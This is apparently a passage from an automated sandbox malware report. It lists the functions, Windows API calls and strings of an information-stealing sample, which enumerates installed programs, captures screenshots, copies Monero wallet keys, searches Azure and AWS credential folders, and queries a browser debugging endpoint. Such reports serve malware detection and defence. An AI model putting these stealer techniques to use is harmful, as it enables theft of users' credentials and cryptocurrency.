                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$??3@CloseFileHandleOpenReadmemcpy$strlen
                                                                                                                                                                                                                                                                                                  • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$http://localhost:
                                                                                                                                                                                                                                                                                                  • API String ID: 1783597538-393890490
                                                                                                                                                                                                                                                                                                  • Opcode ID: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e9bd75843b12caa15a74e03b6a04fcdd02714e47b13e5b8c883d2d1c503f636
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40C1D3706047419BE7249F28C89476FBBE5EF81344F54093EF5829B3D1D778D8448B9A
                                                                                                                                                                                                                                                                                                  Function 00410D80 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 160registrystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410E34
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410FB5
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410FBF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$EnumOpenQueryValue$lstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                  • API String ID: 2273887489-394048932
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                                  • Instruction ID: a9482f3620ee90973302920576edf614ea85895da66572170e0d69f411f645d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD51A371204314ABD710AF61DC85BAFBBE9EF84744F00881EF48A97251DBB89DC5CB96
                                                                                                                                                                                                                                                                                                  Function 00411760 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004117A8
                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004117B5
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004117E2
                                                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                                                  • StrCmpCW.SHLWAPI(?,image/jpeg), ref: 00411878
                                                                                                                                                                                                                                                                                                  • GetHGlobalFromStream.COMBASE(?,00000000), ref: 004118E2
                                                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004118EB
                                                                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(00000000), ref: 004118FF
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00411964
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00417FAE), ref: 0041197F
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00411986
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00411993
                                                                                                                                                                                                                                                                                                  • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSizemalloc
                                                                                                                                                                                                                                                                                                  • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                                                  • API String ID: 290954413-3715547155
                                                                                                                                                                                                                                                                                                  • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                                  • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                                                  Function 00401480 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 212registrymemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004014B7
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004014C5
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004014F9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401505
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401511
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401526
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401611
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileHeap$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcatlstrcpylstrlenmemset
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                                  • API String ID: 288866737-733413667
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf387b9fd6d19a1617bf6ae79588e661abe8b9e9c29212852f5d1e2a3c6b0dcf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f5ab2e365d18679f7850bd259ae8de3c372ef4a79097f50b908b3179d6c5dbc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf387b9fd6d19a1617bf6ae79588e661abe8b9e9c29212852f5d1e2a3c6b0dcf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70717331A10218ABCB14EFA1DD969EE7779AF48704F00405EF9016B152DBBCAEC5CBA5
                                                                                                                                                                                                                                                                                                  Function 004107C0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 69registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-605346811
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4649c964c2ac6d4717e2a874ab9f529b914844d538cc1ef61ec3e528cde88b08
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C11B271340310BBE7206B60EC4AF5BBAAAEB84B56F10402AF345E71E1C6B45C80CB99
                                                                                                                                                                                                                                                                                                  Function 004166A0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 182stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 004166DE
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 004166ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 00416794
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 004167A3
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,0000001C), ref: 0041684A
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416859
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
